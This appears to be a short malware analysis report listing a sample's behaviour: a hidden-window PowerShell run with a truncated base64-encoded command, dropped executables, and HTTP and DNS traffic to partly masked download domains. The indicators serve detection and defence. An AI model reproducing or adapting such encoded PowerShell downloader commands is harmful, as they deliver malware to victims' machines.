Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\791315.cvr
- %HOMEPATH%\306.exe
- 'we#####osspalace.com':80
- http://we#####osspalace.com/hlwk49gos/Oi/
- DNS ASK na####nebolango.com
- DNS ASK an##op.xyz
- DNS ASK wo############591-66491-179337.cloudwaysapps.com
- DNS ASK we#####osspalace.com
- DNS ASK re###wtral.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (with hidden window)